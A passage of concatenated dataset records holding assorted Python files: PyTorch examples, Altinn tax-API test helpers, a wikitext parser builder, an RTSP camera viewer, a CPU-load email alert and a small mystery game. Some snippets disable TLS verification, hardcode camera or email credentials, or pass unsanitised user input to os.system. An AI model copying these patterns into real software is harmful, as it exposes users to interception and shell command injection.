range(random.randint(0, 10)):\n h_relu = self.middle_linear(h_relu).clamp(min=0)\n print('!', end='')\n print()\n y_pred = self.output_linear(h_relu)\n return y_pred\n\nN, D_in, H, D_out = 64, 1000, 100, 10\n\nx = torch.randn(N, D_in)\ny = torch.randn(N, D_out)\n\nmodel = DynamicNet(D_in, H, D_out)\n\ncriteria = torch.nn.MSELoss(reduction='sum')\nopt = torch.optim.SGD(model.parameters(), lr=1e-4, momentum=0.9)\n\nfor t in range(500):\n y_pred = model(x)\n\n loss = criteria(y_pred, y)\n print(t, loss.item())\n\n opt.zero_grad()\n loss.backward()\n opt.step()\n","sub_path":"control_flow.py","file_name":"control_flow.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"218718366","text":"from skatteetaten_api import main_relay\nimport requests\nfrom pathlib import Path\n\n# Slå av sertifikat verifikasjon i test\nimport urllib3\nurllib3.disable_warnings()\n\nALTINN_URL = \"https://skd.apps.tt02.altinn.no\"\n\ndef hent_altinn_token(idporten_token: dict) -> dict:\n altinn3 = \"https://platform.tt02.altinn.no/authentication/api/v1/exchange/id-porten\"\n r = requests.get(altinn3, headers=idporten_token, verify=False)\n r.raise_for_status()\n altinn_header = {\"Authorization\": \"Bearer \" + r.text}\n print(altinn_header)\n return altinn_header\n\n\ndef hent_party_id(token: 
dict, appnavn: str = \"skd/sirius-skattemelding-v1\") -> str:\n    url = f\"{ALTINN_URL}/{appnavn}/api/v1/profile/user\"\n    r = requests.get(url, headers=token, verify=False)\n    r.raise_for_status()\n    return str(r.json()[\"partyId\"])\n\n\ndef opprett_ny_instans(header: dict, fnr: str, appnavn: str = \"skd/sirius-skattemelding-v1\") -> dict:\n    payload = {\n        \"instanceOwner\": {\n            \"personNumber\": fnr\n        },\n        \"appOwner\": {\n            \"labels\": [\"gr\", \"x2\"]\n        },\n        \"appId\": appnavn,\n        \"dueBefore\": \"2020-06-01T12:00:00Z\",\n        \"visibleAfter\": \"2019-05-20T00:00:00Z\",\n        \"title\": {\"nb\": \"Skattemelding\"}\n    }\n    url = f\"{ALTINN_URL}/{appnavn}/instances/\"\n    r = requests.post(url, headers=header, json=payload, verify=False)\n    r.raise_for_status()\n    return r.json()\n\n\ndef last_opp_metadata(instans_data: dict, token: dict, xml: str = None, appnavn: str = \"skd/sirius-skattemelding-v1\") -> requests.Response:\n    id = instans_data['id']\n    data_id = instans_data['data'][0]['id']\n\n    url = f\"{ALTINN_URL}/{appnavn}/instances/{id}/data/{data_id}\"\n    token[\"content-type\"] = \"application/xml\"\n    r = requests.put(url, data=xml, headers=token, verify=False)\n    r.raise_for_status()\n    return r\n\ndef last_opp_metadata_json(instans_data: dict, token: dict, inntektsaar: int = 2021, appnavn: str = \"skd/sirius-skattemelding-v2\") -> requests.Response:\n    id = instans_data['id']\n    data_id = instans_data['data'][0]['id']\n\n    url = f\"{ALTINN_URL}/{appnavn}/instances/{id}/data/{data_id}\"\n    token[\"content-type\"] = \"application/json\"\n    payload = {\"inntektsaar\": inntektsaar}\n    r = requests.put(url, json=payload, headers=token, verify=False)\n    r.raise_for_status()\n    return r\n\n\ndef last_opp_skattedata(instans_data: dict, token: dict, xml: str,\n                        data_type: str =\"skattemelding\",\n                        appnavn: str = \"skd/sirius-skattemelding-v1\") -> requests.Response:\n    url = f\"{ALTINN_URL}/{appnavn}/instances/{instans_data['id']}/data?dataType={data_type}\"\n    token[\"content-type\"] = \"text/xml\"\n    token[\"Content-Disposition\"] = \"attachment; filename=skattemelding.xml\"\n\n    r = requests.post(url, data=xml, headers=token, verify=False)\n    return r\n\n\ndef last_opp_vedlegg(instans_data: dict, token: dict, vedlegg_fil, content_type: str,\n                     data_type=\"skattemelding-vedlegg\",\n                     appnavn: str = \"skd/sirius-skattemelding-v1\") -> requests.Response:\n\n    url = f\"{ALTINN_URL}/{appnavn}/instances/{instans_data['id']}/data?dataType={data_type}\"\n    filnavn = Path(vedlegg_fil).name\n    token[\"content-type\"] = content_type\n    token[\"Content-Disposition\"] = f\"attachment; filename={filnavn}\"\n\n    with open(vedlegg_fil, 'rb') as f:\n        vedlegg_blob = f.read()\n\n    r = requests.post(url, data=vedlegg_blob, headers=token, verify=False)\n    r.raise_for_status()\n    return r\n\n\ndef endre_prosess_status(instans_data: dict, token: dict, neste_status: str, appnavn: str = \"skd/sirius-skattemelding-v1\") -> str:\n    if neste_status not in [\"start\", \"next\", \"completeProcess\"]:\n        raise NotImplementedError\n\n    url = f\"{ALTINN_URL}/{appnavn}/instances/{instans_data['id']}/process/{neste_status}\"\n    r = requests.put(url, headers=token, verify=False)\n    r.raise_for_status()\n    return r.text\n\n\nif __name__ == '__main__':\n    print(\"These are a number of helper methods used by the jupyter notebook application\")\n","sub_path":"docs/test/testinnsending/altinn3.py","file_name":"altinn3.py","file_ext":"py","file_size_in_byte":3972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"424867280","text":"#!/usr/bin/env python3\n\nimport os\nimport pandas as 
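Tying the altinn3.py helpers above together, a hedged sketch of the intended call order; the id-porten token, person number, and file name are placeholders, and the app-name/version pairing is an assumption:

```python
from altinn3 import (hent_altinn_token, opprett_ny_instans, last_opp_metadata_json,
                     last_opp_skattedata, endre_prosess_status)

idporten_token = {"Authorization": "Bearer <idporten-jwt>"}   # placeholder token
token = hent_altinn_token(idporten_token)                     # exchange for an Altinn bearer token
instans = opprett_ny_instans(token, fnr="01019012345",        # placeholder test fnr
                             appnavn="skd/sirius-skattemelding-v2")
last_opp_metadata_json(instans, token, inntektsaar=2021)
with open("skattemelding.xml") as f:                          # illustrative file
    last_opp_skattedata(instans, token, f.read(),
                        appnavn="skd/sirius-skattemelding-v2")
endre_prosess_status(instans, token, "next",
                     appnavn="skd/sirius-skattemelding-v2")
```

Note that the helpers mutate the shared `token` dict (they set content-type and disposition headers), so the same dict carries state between calls.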
pd\nfrom torch.utils.data import Dataset\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport torch\n\nclass RirnetDatabase(Dataset):\n    \"\"\" Data-Target dataset to use with rirnet\"\"\"\n\n    def __init__(self, is_training, args, data_transform=None, target_transform=None):\n        if is_training:\n            csv_file = args.train_db_path\n        else:\n            csv_file = args.val_db_path\n\n        database = pd.read_csv(csv_file) #, nrows = 1000)\n\n        self.n_peaks = args.n_peaks\n        self.dataset = database\n        self.data_transform = data_transform\n        self.target_transform = target_transform\n\n    def __len__(self):\n        return len(self.dataset)\n\n\n    def __getitem__(self, idx):\n        data_path = self.dataset.iloc[idx, 2]\n        target_path = self.dataset.iloc[idx, 1]\n        data = np.load(data_path)\n        target = np.load(target_path)\n        order = np.argsort(target[0])\n        target = target[:, order]\n        permute = np.random.permutation(range(self.n_peaks))\n\n        if self.data_transform and self.target_transform:\n            data = self.data_transform(data)\n            target = self.target_transform(target)[:, :self.n_peaks]\n            #target = target[:, permute]\n            #target += torch.rand(2,1)\n        return data, target\n","sub_path":"signalnet/rirnet/rirnet_database.py","file_name":"rirnet_database.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"135123724","text":"# Three-Sum Problem\n\nthe_list = [0, 0, 0, 7, -3, -4, 10, -3, -7, 8, -4, -4]\n\nlist_length = len(the_list)\nunique_triples = []\n\nprint('These are the true things:')\nfor x in range(0, list_length):\n\tthing_1 = the_list[x]\n\tfor y in range(x + 1, list_length):\n\t\tthing_2 = the_list[y]\n\t\tfor z in range(y + 1, list_length):\n\t\t\tthing_3 = the_list[z]\n\t\t\tthe_result = thing_1 + thing_2 + thing_3 == 0\n\t\t\tif the_result == True:\n\t\t\t\ttriple = {thing_1, thing_2, thing_3}\n\t\t\t\tif triple not in unique_triples:\n\t\t\t\t\tunique_triples.append(triple)\n\t\t\t\t\toutput = '{} and {} and {}'.format(thing_1, thing_2, thing_3)\n\t\t\t\t\tprint(output)\n\n# ______________________\n# Semi-related recursive stuff\n# 1! = 1\n# 2! = 2*1\n# 3! = 3*2*1\n# 4! = 4*3*2*1\n# 5! = 5*4*3*2*1\n# 6! = 6*5*4*3*2*1\n\n# def factorial(n):\n# \tif n == 1:\n# \t\treturn 1\n# \telse:\n# \t\treturn n * factorial(n - 1)\n\n\n\n\n\t\n","sub_path":"level-2/class2/class2.py","file_name":"class2.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"107124456","text":"# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2012-2014 Ben Kurtovic \n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
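The triple loop in the class2.py record above is O(n³). The standard improvement sorts the list and sweeps two pointers per anchor element for O(n²); a sketch using the same input:

```python
def three_sum(nums):
    # classic sort + two-pointer three-sum, collecting unique triples
    nums = sorted(nums)
    triples = set()
    for i in range(len(nums) - 2):
        lo, hi = i + 1, len(nums) - 1
        while lo < hi:
            s = nums[i] + nums[lo] + nums[hi]
            if s == 0:
                triples.add((nums[i], nums[lo], nums[hi]))
                lo, hi = lo + 1, hi - 1
            elif s < 0:
                lo += 1   # sum too small: advance the low pointer
            else:
                hi -= 1   # sum too large: retreat the high pointer
    return triples

print(three_sum([0, 0, 0, 7, -3, -4, 10, -3, -7, 8, -4, -4]))
```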
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nfrom __future__ import unicode_literals\n\nfrom . import tokens\nfrom ..compat import str\nfrom ..nodes import (Argument, Comment, ExternalLink, Heading, HTMLEntity, Tag,\n Template, Text, Wikilink)\nfrom ..nodes.extras import Attribute, Parameter\nfrom ..smart_list import SmartList\nfrom ..wikicode import Wikicode\n\n__all__ = [\"Builder\"]\n\nclass Builder(object):\n \"\"\"Combines a sequence of tokens into a tree of ``Wikicode`` objects.\n\n To use, pass a list of :py:class:`~.Token`\\ s to the :py:meth:`build`\n method. The list will be exhausted as it is parsed and a\n :py:class:`~.Wikicode` object will be returned.\n \"\"\"\n\n def __init__(self):\n self._tokens = []\n self._stacks = []\n\n def _wrap(self, nodes):\n \"\"\"Properly wrap a list of nodes in a ``Wikicode`` object.\"\"\"\n return Wikicode(SmartList(nodes))\n\n def _push(self):\n \"\"\"Push a new node list onto the stack.\"\"\"\n self._stacks.append([])\n\n def _pop(self, wrap=True):\n \"\"\"Pop the current node list off of the stack.\n\n If *wrap* is ``True``, we will call :py:meth:`_wrap` on the list.\n \"\"\"\n if wrap:\n return self._wrap(self._stacks.pop())\n return self._stacks.pop()\n\n def _write(self, item):\n \"\"\"Append a node to the current node list.\"\"\"\n self._stacks[-1].append(item)\n\n def _handle_parameter(self, default):\n \"\"\"Handle a case where a parameter is at the head of the tokens.\n\n *default* is the value to use if no parameter name is defined.\n \"\"\"\n key = None\n showkey = False\n self._push()\n while self._tokens:\n token = self._tokens.pop()\n if isinstance(token, tokens.TemplateParamEquals):\n key = self._pop()\n showkey = True\n self._push()\n elif isinstance(token, (tokens.TemplateParamSeparator,\n tokens.TemplateClose)):\n self._tokens.append(token)\n value = self._pop()\n if key is None:\n key = self._wrap([Text(str(default))])\n return Parameter(key, value, showkey)\n else:\n self._write(self._handle_token(token))\n\n def _handle_template(self):\n \"\"\"Handle a case where a template is at the head of the tokens.\"\"\"\n params = []\n default = 1\n self._push()\n while self._tokens:\n token = self._tokens.pop()\n if isinstance(token, tokens.TemplateParamSeparator):\n if not params:\n name = self._pop()\n param = self._handle_parameter(default)\n params.append(param)\n if not param.showkey:\n default += 1\n elif isinstance(token, tokens.TemplateClose):\n if not params:\n name = self._pop()\n return Template(name, params)\n else:\n self._write(self._handle_token(token))\n\n def _handle_argument(self):\n \"\"\"Handle a case where an argument is at the head of the tokens.\"\"\"\n name = None\n self._push()\n while self._tokens:\n token = self._tokens.pop()\n if isinstance(token, tokens.ArgumentSeparator):\n name = self._pop()\n self._push()\n elif isinstance(token, tokens.ArgumentClose):\n if name is not None:\n return Argument(name, self._pop())\n return Argument(self._pop())\n else:\n self._write(self._handle_token(token))\n\n def _handle_wikilink(self):\n \"\"\"Handle a case where a wikilink is at the head of the tokens.\"\"\"\n title = None\n self._push()\n while self._tokens:\n token = self._tokens.pop()\n if isinstance(token, tokens.WikilinkSeparator):\n title = self._pop()\n self._push()\n elif 
isinstance(token, tokens.WikilinkClose):\n if title is not None:\n return Wikilink(title, self._pop())\n return Wikilink(self._pop())\n else:\n self._write(self._handle_token(token))\n\n def _handle_external_link(self, token):\n \"\"\"Handle when an external link is at the head of the tokens.\"\"\"\n brackets, url = token.brackets, None\n self._push()\n while self._tokens:\n token = self._tokens.pop()\n if isinstance(token, tokens.ExternalLinkSeparator):\n url = self._pop()\n self._push()\n elif isinstance(token, tokens.ExternalLinkClose):\n if url is not None:\n return ExternalLink(url, self._pop(), brackets)\n return ExternalLink(self._pop(), brackets=brackets)\n else:\n self._write(self._handle_token(token))\n\n def _handle_entity(self):\n \"\"\"Handle a case where an HTML entity is at the head of the tokens.\"\"\"\n token = self._tokens.pop()\n if isinstance(token, tokens.HTMLEntityNumeric):\n token = self._tokens.pop()\n if isinstance(token, tokens.HTMLEntityHex):\n text = self._tokens.pop()\n self._tokens.pop() # Remove HTMLEntityEnd\n return HTMLEntity(text.text, named=False, hexadecimal=True,\n hex_char=token.char)\n self._tokens.pop() # Remove HTMLEntityEnd\n return HTMLEntity(token.text, named=False, hexadecimal=False)\n self._tokens.pop() # Remove HTMLEntityEnd\n return HTMLEntity(token.text, named=True, hexadecimal=False)\n\n def _handle_heading(self, token):\n \"\"\"Handle a case where a heading is at the head of the tokens.\"\"\"\n level = token.level\n self._push()\n while self._tokens:\n token = self._tokens.pop()\n if isinstance(token, tokens.HeadingEnd):\n title = self._pop()\n return Heading(title, level)\n else:\n self._write(self._handle_token(token))\n\n def _handle_comment(self):\n \"\"\"Handle a case where an HTML comment is at the head of the tokens.\"\"\"\n self._push()\n while self._tokens:\n token = self._tokens.pop()\n if isinstance(token, tokens.CommentEnd):\n contents = self._pop()\n return Comment(contents)\n else:\n self._write(self._handle_token(token))\n\n def _handle_attribute(self, start):\n \"\"\"Handle a case where a tag attribute is at the head of the tokens.\"\"\"\n name, quoted = None, False\n self._push()\n while self._tokens:\n token = self._tokens.pop()\n if isinstance(token, tokens.TagAttrEquals):\n name = self._pop()\n self._push()\n elif isinstance(token, tokens.TagAttrQuote):\n quoted = True\n elif isinstance(token, (tokens.TagAttrStart, tokens.TagCloseOpen,\n tokens.TagCloseSelfclose)):\n self._tokens.append(token)\n if name:\n value = self._pop()\n else:\n name, value = self._pop(), None\n return Attribute(name, value, quoted, start.pad_first,\n start.pad_before_eq, start.pad_after_eq)\n else:\n self._write(self._handle_token(token))\n\n def _handle_tag(self, token):\n \"\"\"Handle a case where a tag is at the head of the tokens.\"\"\"\n close_tokens = (tokens.TagCloseSelfclose, tokens.TagCloseClose)\n implicit, attrs, contents, closing_tag = False, [], None, None\n wiki_markup, invalid = token.wiki_markup, token.invalid or False\n self._push()\n while self._tokens:\n token = self._tokens.pop()\n if isinstance(token, tokens.TagAttrStart):\n attrs.append(self._handle_attribute(token))\n elif isinstance(token, tokens.TagCloseOpen):\n padding = token.padding or \"\"\n tag = self._pop()\n self._push()\n elif isinstance(token, tokens.TagOpenClose):\n contents = self._pop()\n self._push()\n elif isinstance(token, close_tokens):\n if isinstance(token, tokens.TagCloseSelfclose):\n tag = self._pop()\n self_closing = True\n padding = token.padding 
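The mwparserfromhell `Builder` above consumes a reversed token list with a stack discipline: `_push` opens a fresh node buffer, `_write` appends to the top buffer, and `_pop` closes and wraps it. A stripped-down illustration of that pattern on a toy bracket grammar (not the library's API):

```python
def build(tokens):
    # toy version of the Builder stack discipline: '(' pushes a new
    # buffer, ')' pops it and writes the finished group one level down
    stacks = [[]]
    for tok in tokens:
        if tok == '(':
            stacks.append([])
        elif tok == ')':
            group = stacks.pop()
            stacks[-1].append(group)
        else:
            stacks[-1].append(tok)
    return stacks.pop()

print(build(list("a(b(c)d)e")))  # ['a', ['b', ['c'], 'd'], 'e']
```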
or \"\"\n implicit = token.implicit or False\n else:\n self_closing = False\n closing_tag = self._pop()\n return Tag(tag, contents, attrs, wiki_markup, self_closing,\n invalid, implicit, padding, closing_tag)\n else:\n self._write(self._handle_token(token))\n\n def _handle_token(self, token):\n \"\"\"Handle a single token.\"\"\"\n if isinstance(token, tokens.Text):\n return Text(token.text)\n elif isinstance(token, tokens.TemplateOpen):\n return self._handle_template()\n elif isinstance(token, tokens.ArgumentOpen):\n return self._handle_argument()\n elif isinstance(token, tokens.WikilinkOpen):\n return self._handle_wikilink()\n elif isinstance(token, tokens.ExternalLinkOpen):\n return self._handle_external_link(token)\n elif isinstance(token, tokens.HTMLEntityStart):\n return self._handle_entity()\n elif isinstance(token, tokens.HeadingStart):\n return self._handle_heading(token)\n elif isinstance(token, tokens.CommentStart):\n return self._handle_comment()\n elif isinstance(token, tokens.TagOpenOpen):\n return self._handle_tag(token)\n\n def build(self, tokenlist):\n \"\"\"Build a Wikicode object from a list tokens and return it.\"\"\"\n self._tokens = tokenlist\n self._tokens.reverse()\n self._push()\n while self._tokens:\n node = self._handle_token(self._tokens.pop())\n self._write(node)\n return self._pop()\n","sub_path":"mwparserfromhell/parser/builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":11434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"523326822","text":"import cv2\nimport sys\n\nfrom PySide2.QtCore import QThread, Signal, Slot\nfrom PySide2.QtGui import QImage, Qt, QPixmap, QCloseEvent, QMouseEvent\nfrom PySide2.QtWidgets import QWidget, QLabel, QApplication, QGridLayout, QStatusBar, QMainWindow\n\n\n# TODO remove this ugliness... Qt is not good for this.\n\nclass ImageUpdater(QThread):\n update = Signal(QImage)\n\n def __init__(self, rtsp_url: str, parent=None):\n super().__init__(parent)\n self._max_fps = 60\n self._is_running = False\n self.capture = cv2.VideoCapture(\n f\"rtspsrc location=\\\"{rtsp_url}\\\" ! rtph264depay ! h264parse ! avdec_h264 ! autovideoconvert ! 
appsink\",\n cv2.CAP_GSTREAMER\n )\n\n def stop(self):\n self._is_running = False\n self.wait()\n\n def run(self):\n self.msleep(1000)\n self._is_running = True\n while self._is_running:\n result, frame = self.capture.read()\n if result:\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n h, w, ch = frame.shape\n bytes_per_line = ch * w\n converted = QImage(frame.data, w, h, bytes_per_line, QImage.Format_RGB888)\n self.update.emit(converted)\n self.msleep(int(1000 / self._max_fps))\n\n\nclass ImageWidget(QLabel):\n mouse_move = Signal(float, float)\n\n def __init__(self, loading_text: str, scale_factor=1.0, parent=None):\n super().__init__(loading_text, parent=parent)\n self.scale_factor = scale_factor\n\n def mouseMoveEvent(self, event: QMouseEvent):\n self.mouse_move.emit(event.x(), event.y())\n\n @Slot(QImage)\n def update_image(self, image: QImage):\n pix_map = QPixmap.fromImage(image)\n pix_map = pix_map.scaled(\n int(image.width() * self.scale_factor),\n int(image.height() * self.scale_factor),\n Qt.AspectRatioMode.KeepAspectRatio\n )\n self.setPixmap(pix_map)\n\n\nclass MainWindow(QMainWindow):\n def __init__(self, rtsp_url: str, parent=None):\n super().__init__(parent)\n self.image_updater = ImageUpdater(rtsp_url, self)\n\n self.status_bar = QStatusBar()\n self.setStatusBar(self.status_bar)\n\n self.position_label = QLabel(\"X: -, Y: -\")\n self.status_bar.addWidget(self.position_label)\n\n self.central_widget = QWidget()\n\n self.main_grid = QGridLayout()\n self.secondary_grid = QGridLayout()\n self.main_grid.addLayout(self.secondary_grid, 0, 0)\n\n self.main_image = ImageWidget(\"Connecting...\", 0.7)\n self.main_image.mouse_move.connect(lambda x, y: self.position_label.setText(f\"X: {x}, Y: {y}\"))\n self.main_grid.addWidget(self.main_image, 0, 1)\n\n self.roi_image = QLabel(\"No image data\")\n self.secondary_grid.addWidget(self.roi_image, 0, 0)\n\n self.central_widget.setLayout(self.main_grid)\n self.setCentralWidget(self.central_widget)\n self.resize(1600, 800)\n self.setWindowTitle('Parking statistics')\n self.show()\n\n self.image_updater.update.connect(self.main_image.update_image, Qt.QueuedConnection)\n self.image_updater.start()\n\n def closeEvent(self, event: QCloseEvent):\n self.image_updater.stop()\n event.accept()\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n window = MainWindow(\"rtsp://admin:123@192.168.1.106:554/onvif1\")\n sys.exit(app.exec_())\n","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"283899793","text":"def check_loadavg():\n\t#get load average\n\twith open(\"/proc/loadavg\",\"r\") as handle:\n\t\tloadavg = handle.read().split()\n\t#get number of CPU's\n\twith open(\"/proc/cpuinfo\",\"r\") as handle:\n\t\tcpuinfo = [x for x in handle.readlines() if \"processor\" in x]\n\n\t#figure out if CPU usage is too high or not\n\tfor x in range(1,3):\n\t\tif float(loadavg[x]) < (len(cpuinfo) * 0.925):\n\t\t\treturn None\n\t\telif float(loadavg[x]) > (len(cpuinfo) * 0.925):\n\t\t\tif x == 2:\n\t\t\t\treturn \"CPU usage has been High for Too long check ASAP!!!\"\n\t\t\telse:\n\t\t\t\treturn \"CPU usage is a little high, might be worth having a check\"\n\n#send an email if CPU usage is too high\nstatus = check_loadavg()\nif status != None:\n\tmsgbody = status\n\timport smtplib\n\tfrom email.mime.text import MIMEText\n\n\tmsg = MIMEText(msgbody)\n\tmsg['Subject'] = \"CPU Usage Alert!!\"\n\tmsg['From'] = 
'servername'\n\tmsg['To'] = 'alert@address.com'\n\n\ts = smtplib.SMTP('smtp.gmail.com', 587)\n\ts.starttls()\n\ts.login(\"usernamehere@gmail.com\",\"password\")\n\ts.sendmail(msg['From'], [msg['To']], msg.as_string())\n\ts.quit()\n","sub_path":"loadavg-alert.py","file_name":"loadavg-alert.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"474579919","text":"import os\n\ndef main():\n\n    directory = input(\"Choose directory of images you'd like to scale: \")\n    image_size = input(\"Choose the new image size you'd like: \")\n\n    cmd = 'ImageResizer/ImageResizer/bin/ImageResizer' + ' ' + directory + ' ' + str(image_size)\n    os.system(cmd)\n\n    print('All done!')\n\nif __name__== \"__main__\":\n    main()\n\n","sub_path":"resize_images.py","file_name":"resize_images.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"211721740","text":"import random\nimport pprint\nimport time\nimport sys\n\nSUSPECTS = ['DUKE HAUTDOG', 'MAXIMUM POWERS', 'BILL MONOPOLIS', 'SENATOR SCHMEAR', 'MRS. FEATHERTOSS',\n            'DR. JEAN SPLICER', 'RAFFLES THE CLOWN', 'ESPRESSA TOFFEEPOT', 'CECIL EDGAR VANDERTON']\nITEMS = ['FLASHLIGHT', 'CANDLESTICK', 'RAINBOW FLAG', 'HAMSTER WHEEL', 'ANIME VHS TAPE',\n         'JAR OF PICKLES', 'ONE COWBOY BOOT', 'CLEAN UNDERPANTS', '5 DOLLAR GIFT CARD']\nPLACES = ['ZOO', 'OLD BARN', 'DUCK POND', 'CITY HALL', 'HIPSTER CAFE',\n          'BOWLING ALLEY', 'VIDEO GAME MUSEUM', 'UNIVERSITY LIBRARY', 'ALBINO ALLIGATOR PIT']\nTIME_TO_SOLVE = 300 # Seconds\n\nPLACE_FIRST_LETTERS = {}\nLONGEST_PLACE_NAME_LENGTH = 0\nfor place in PLACES:\n    PLACE_FIRST_LETTERS[place[0]] = place\n    LONGEST_PLACE_NAME_LENGTH = len(place) if len(\n        place) > LONGEST_PLACE_NAME_LENGTH else LONGEST_PLACE_NAME_LENGTH\n\nassert len(SUSPECTS) == 9\nassert len(ITEMS) == 9\nassert len(PLACES) == 9\nassert len(PLACE_FIRST_LETTERS.keys()) == len(PLACES)\n\nknownSuspectsAndItems = []\nvisitedPlaces = {}\ncurrentLocation = 'TAXI'\naccusedSuspects = []\nliars = random.sample(SUSPECTS, random.randint(3, 4))\naccusationsLeft = 3\nculprit = random.choice(SUSPECTS)\n\nrandom.shuffle(SUSPECTS)\nrandom.shuffle(ITEMS)\nrandom.shuffle(PLACES)\n\nclues = {}\nfor idx, interviewee in enumerate(SUSPECTS):\n    if interviewee in liars:\n        continue\n\n    clues[interviewee] = {}\n    clues[interviewee]['debug_liar'] = False\n    for item in ITEMS:\n        clues[interviewee][item] = PLACES[ITEMS.index(item)] if random.randint(\n            0, 1) else SUSPECTS[ITEMS.index(item)]\n    for suspect in SUSPECTS:\n        clues[interviewee][suspect] = PLACES[SUSPECTS.index(\n            suspect)] if random.randint(0, 1) else ITEMS[SUSPECTS.index(suspect)]\n\nfor i, interviewee in enumerate(SUSPECTS):\n    if interviewee not in liars:\n        continue\n\n    clues[interviewee] = {}\n    clues[interviewee]['debug_liar'] = True\n\n    for item in ITEMS:\n        if random.randint(0, 1):\n            while True:\n                clues[interviewee][item] = random.choice(PLACES)\n                if clues[interviewee][item] != PLACES[ITEMS.index(item)]:\n                    break\n        else:\n            while True:\n                clues[interviewee][item] = random.choice(SUSPECTS)\n                if clues[interviewee][item] != SUSPECTS[ITEMS.index(item)]:\n                    break\n\n    for suspect in SUSPECTS:\n        if random.randint(0, 1):\n            while True:\n                clues[interviewee][suspect] = random.choice(PLACES)\n                if clues[interviewee][suspect] != PLACES[SUSPECTS.index(suspect)]:\n                    break\n        else:\n            while True:\n                clues[interviewee][suspect] = random.choice(ITEMS)\n                if clues[interviewee][suspect] != 
ITEMS[SUSPECTS.index(suspect)]:\n                    break\n\nzophieClues = {}\nfor interviewee in random.sample(SUSPECTS, random.randint(3, 4)):\n    kindOfClue = random.randint(1, 3)\n    if kindOfClue == 1:\n        if interviewee not in liars:\n            zophieClues[interviewee] = culprit\n        elif interviewee in liars:\n            while True:\n                zophieClues[interviewee] = random.choice(SUSPECTS)\n                if zophieClues[interviewee] != culprit:\n                    break\n\n    elif kindOfClue == 2:\n        if interviewee not in liars:\n            zophieClues[interviewee] = PLACES[SUSPECTS.index(culprit)]\n        elif interviewee in liars:\n            while True:\n                zophieClues[interviewee] = random.choice(PLACES)\n                if zophieClues[interviewee] != PLACES[SUSPECTS.index(culprit)]:\n                    break\n\n    elif kindOfClue == 3:\n        if interviewee not in liars:\n            zophieClues[interviewee] = ITEMS[SUSPECTS.index(culprit)]\n        elif interviewee in liars:\n            while True:\n                zophieClues[interviewee] = random.choice(ITEMS)\n                if zophieClues[interviewee] != ITEMS[SUSPECTS.index(culprit)]:\n                    break\n\n# pprint.pprint(clues)\n# pprint.pprint(zophieClues)\n# print(f'culprit = {culprit}')\n\nprint(\"\"\"J'ACCUSE! (a mystery game)\nInspired by Homestar Runner\\'s \"Where\\'s an Egg?\" game\n\nYou are the world-famous detective Mathilde Camus.\nZOPHIE THE CAT has gone missing, and you must sift through the clues.\nSuspects either always tell lies, or always tell the truth. Ask them\nabout other people, places, and items to see if the details they give are\ntruthful and consistent with your observations. Then you will know if\ntheir clue about ZOPHIE THE CAT is true or not. Will you find ZOPHIE THE\nCAT in time and accuse the guilty party?\n\"\"\")\ninput('Press Enter to begin...')\n\nstartTime = time.time()\nendTime = startTime + TIME_TO_SOLVE\n\nwhile True:\n    if time.time() > endTime or accusationsLeft == 0:\n        if accusationsLeft == 0:\n            print('You have accused too many innocent people!')\n        elif time.time() > endTime:\n            print('You have run out of time!')\n        culpritIdx = SUSPECTS.index(culprit)\n        print(\n            f'It was {culprit} at the {PLACES[culpritIdx]} with the {ITEMS[culpritIdx]} who catnapped her!')\n        print('Better luck next time, Detective.')\n        sys.exit()\n\n    print()\n    minutesLeft = int(endTime - time.time()) // 60\n    secondsLeft = int(endTime - time.time()) % 60\n    print(f'Time left: {minutesLeft} min, {secondsLeft} sec')\n\n    if currentLocation == 'TAXI':\n        print('  You are in your TAXI. 
